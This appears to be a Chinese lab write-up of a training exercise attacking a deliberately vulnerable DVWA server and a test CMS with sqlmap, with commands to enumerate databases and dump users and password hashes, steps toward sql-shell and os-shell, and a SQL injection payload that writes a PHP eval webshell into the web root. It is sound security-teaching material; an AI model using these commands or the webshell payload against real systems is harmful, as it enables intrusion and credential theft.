zoukankan      html  css  js  c++  java
  • 使用sqlmap

    实验环境要求:

    1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB

    2、安装VMware® Workstation 14以上

    总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机。使用kali中的sqlmap攻击dvwa上的sql注入和sql盲注漏洞。

    任务一、使用kali中的sqlmap攻击dvwa中sql注入漏洞(low)

    1. 测试dvwa注入点,截图

    sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

    1. 列出所有数据库,截图

    1. 获取数据表,截图

    1. 获取数据,截图

    1. 获取所有管理用户,截图

    1. 获取用户密码,截图

    任务二、使用kali中的sqlmap攻击dvwa中sql注入漏洞(medium)

    1. 测试dvwa注入点,截图

    sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

    观察可以看出为POST表单

    使用Burp劫获POST信息

    将信息保存成文件

    使用文件进行攻击

    1. 列出所有数据库,截图

    1. 获取数据表,截图

    1. 获取数据,截图

    1. 获取所有管理用户,截图

    1. 获取用户密码,截图

    任务三、使用kali中的sqlmap攻击dvwa中sql注入漏洞(high)

    1. 测试dvwa注入点,截图

    sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

    观察页面信息为POST表单

    原始方法肯定不行,所以再试试刚才的方法

    保持请求

    试过后发现失败

    查看源码后使用二阶SQL注入—second-order

     

    1. 列出所有数据库,截图

    1. 获取数据表,截图

    1. 获取数据,截图

    1. 获取所有管理用户,截图

    1. 获取用户密码,截图

     

    拓展任务一、使用kali中的sqlmap攻击cms中sql注入漏洞

    1. 测试cms注入点,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1

    1. 列出所有数据库,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs

    1. 获取数据表,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables

    1. 获取数据,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa

    1. 获取所有管理用户,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users

    1. 获取用户密码,截图

    sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords

     

    拓展任务二、通过sql注入漏洞获取sql-shell和os-shell

    1. 使用sqlmap查看当前用户是否为dba,截图

    1. 使用sqlmap获取sql-shell,截图

    1. 使用sqlmap获取os-shell,截图

    直接使用命令是错误的

    我们需要在靶机修改一些参数来实现

    重启服务

    1. 通过sql注入漏洞上传一句话木马,截图

    1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #

    执行不了说明没有权限,修改dvwa文件权限

        

  • 相关阅读:
    读《猫城记》 | 人间失格
    如果这都算是佛系
    常规流(Normal flow)
    页面重绘(repaint)和回流(reflow)
    display:none和visiblity:hidden区别
    读《人类简史》 | 一本很值得读的书
    Mac shell笔记
    读《围城》
    珠海游记
    mouseout、mouseover和mouseleave、mouseenter区别
  • 原文地址:https://www.cnblogs.com/jake-jin/p/12885119.html
Copyright © 2011-2022 走看看